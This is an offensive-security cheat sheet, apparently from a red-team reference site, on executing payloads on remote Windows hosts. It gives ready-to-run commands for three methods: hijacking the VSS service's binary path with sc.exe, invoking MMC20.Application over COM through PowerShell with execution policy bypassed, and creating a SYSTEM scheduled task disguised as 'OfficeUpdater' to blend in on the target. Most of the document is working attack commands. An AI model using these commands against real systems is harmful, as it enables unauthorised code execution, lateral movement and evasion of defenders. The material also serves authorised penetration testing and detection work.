Skip to main content

Table Of Contents

  • Remote Execution
    • sc.exe Remote Execution
    • MMC COM Object
    • Remote Schtasks Execution

REMOTE EXECUTION

  • Note: This section details important and useful commands that can be used to execute payloads on remote systems. Proper administrative credentials must be held to run many of the commands listed below.

SC.EXE REMOTE EXECUTION

  • Note: Upload binary to remote machine, modify existing service to point at that binary, start the service, and re-configure the service binpath back to its original value. VSS is a service that works great for this technique, but other services can work if they meet the requirements listed in the right column below.

Ensure service runs as LocalSystem and log original binary path

sc \\<IP_ADDRESS> qc vss

Ensure service is currently off

sc \\<IP_ADDRESS> query vss

Set remote machine binpath to uploaded binary

sc \\<IP_ADDRESS> config vss binpath= "<FILE_PATH>"

Ensure remote machine service binpath was set correctly

sc \\<IP_ADDRESS> qc vss

Start service on remote machine

sc \\<IP_ADDRESS> start vss

Ensure service is off before setting binpath back to original

sc \\<IP_ADDRESS> stop vss

Set remote machine service binpath back to original

sc \\<IP_ADDRESS> config vss binpath="<FILE_PATH>"

Ensure remote machine service binpath was set back correctly

sc \\<IP_ADDRESS> qc vss

MMC COM OBJECT

  • Note: Upload binary to remote machine system folder and execute via MMC COM execution. Set the proper remote IP and uploaded binary path in the command below and execute via powershell.exe. FILEPATH = full path to target executable to start
  • Note: Only works against Windows Server Targets
powershell -ep bypass -nop -Command ([activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","<IP_ADDRESS>"))). Document.ActiveView.ExecuteShellCommand("<FILE_PATH>",$null,$null,"7")

REMOTE SCHTASKS EXECUTION

  • Note: Upload binary to remote machine, create scheduled task pointing at that binary, run task, and delete task. Can change “OfficeUpdater” to any task name that blends into target system.

Add task

schtasks /Create /F /RU system /SC ONLOGON /TN OfficeUpdater /TR <FILE_PATH> /s <IP_ADDRESS>

Query task verbose

schtasks /query /tn OfficeUpdater /fo list /v /s <IP_ADDRESS>

Run task

schtasks /run /tn OfficeUpdater /s <IP_ADDRESS>

Delete task

schtasks /delete /tn OfficeUpdater /f /s <IP_ADDRESS>